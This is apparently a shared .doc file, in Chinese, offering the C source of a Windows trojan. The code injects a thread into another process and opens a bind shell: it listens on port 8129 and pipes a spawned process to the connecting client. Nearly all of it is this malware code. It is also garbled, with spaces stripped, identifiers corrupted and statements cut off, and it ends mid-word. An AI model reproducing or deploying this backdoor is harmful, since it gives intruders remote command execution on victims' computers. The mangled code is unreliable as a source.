c语言编写的木马程序(源代码附上).doc

#include#pragmacomment(lib,“ws2_32.lib“)#include#include#pragmacomment(lib,“Shlwapi.lib“)#include#include#include//参数结构;typedefstruct_RemotePara{DWORDdwLoadLibrary;DWORDdwFreeLibrary;DWORDdwGetProcAddress;DWORDdwGetModuleHandle;DWORDdwWSAStartup;DWORDdwSocket;DWORDdwhtons;DWORDdwbind;DWORDdwlisten;DWORDdwaccept;DWORDdwsend;DWORDdwrecv;DWORDdwclosesocket;DWORDdwCreateProcessA;DWORDdwPeekNamedPipe;DWORDdwWriteFile;DWORDdwReadFile;DWORDdwCloseHandle;DWORDdwCreatePipe;DWORDdwTerminateProcess;DWORDdwMessageBox;charstrMessageBox[12];charwinsockDll[16];char[10];charBuff[4096];chartelnetmsg[60];}RemotePara;//提升应用级调试权限BOOLEnablePrivilege(HANDLEhToken,LPCTSTRszPrivName,BOOLfEnable);//根据进程名称得到进程IDDWORDGetPidByName(char*szName);//远程线程执行体DWORD__stdcallThreadProc(RemotePara*Para){WSADATAWSAData;WORDnVersion;SOCKETlistenSocket;SOCKETclientSocket;structsockaddr_inserver_addr;structsockaddr_inclient_addr;intiAddrSize=sizeof(client_addr);SECURITY_ATTRIBUTESsa;HANDLEhReadPipe1;HANDLEhWritePipe1;HANDLEhReadPipe2;HANDLEhWritePipe2;STARTUPINFOsi;PROCESS_INATIONProcessInation;unsignedlonglBytesRead=0;typedefHINSTANCE(__stdcall*PLoadLibrary)(char*);typedefFARPROC(__stdcall*PGetProcAddress)(HMODULE,LPCSTR);typedefHINSTANCE(__stdcall*PFreeLibrary)(HINSTANCE);typedefHINSTANCE(__stdcall*PGetModuleHandle)(HMODULE);FARPROCPMessageBoxA;FARPROCPWSAStartup;FARPROCPSocket;FARPROCPhtons;FARPROCPbind;FARPROCPlisten;FARPROCPaccept;FARPROCPsend;FARPROCPrecv;FARPROCPclosesocket;FARPROCPCreateProcessA;FARPROCPPeekNamedPipe;FARPROCPWriteFile;FARPROCPReadFile;FARPROCPCloseHandle;FARPROCPCreatePipe;FARPROCPTerminateProcess;PLoadLibraryLoadLibraryFunc=(PLoadLibrary)Para->dwLoadLibrary;PGetProcAddressGetProcAddressFunc=(PGetProcAddress)Para->dwGetProcAddress;PFreeLibraryFreeLibraryFunc=(PFreeLibrary)Para->dwFreeLibrary;PGetModuleHandleGetModuleHandleFunc=(PGetModuleHandle)Para->dwGetModuleHandle;LoadLibraryFunc(Para->winsockDll);PWSAStartup=(FARPROC)Para->dwWSAStartup;PSocket=(FARPROC)Para->dwSocket;Phtons=(FARPROC)Para->dwhtons;Pbind=(FARPROC)Para->dwbind;Plisten=(FARPROC)Para->dwlisten;Paccept=(FARPROC)Para->dwaccept;Psend=(FARPROC)Para->dwsend;Precv=(FARPROC)Para->dwrecv;Pclosesocket=(FARPROC)Para->dwclosesocket;PCreateProcessA=(FARPROC)Para->dwCreateProcessA;PPeekNamedPipe=(FARPROC)Para->dwPeekNamedPipe;PWriteFile=(FARPROC)Para->dwWriteFile;PReadFile=(FARPROC)Para->dwReadFile;PCloseHandle=(FARPROC)Para->dwCloseHandle;PCreatePipe=(FARPROC)Para->dwCreatePipe;PTerminateProcess=(FARPROC)Para->dwTerminateProcess;PMessageBoxA=(FARPROC)Para->dwMessageBox;nVersion=MAKEWORD(2,1);PWSAStartup(nVersion,(LPWSADATA)listenSocket=PSocket(AF_INET,SOCK_STREAM,0);if(listenSocket==INVALID_SOCKET)return0;server_addr.sin_family=AF_INET;server_addr.sin_port=Phtons((unsignedshort)(8129));server_addr.sin_addr.s_addr=INADDR_ANY;if(Pbind(listenSocket,(structsockaddr*)if(Plisten(listenSocket,5))return0;clientSocket=Paccept(listenSocket,(structsockaddr*)if(!PCreatePipe(if(!PCreatePipe(ZeroMemor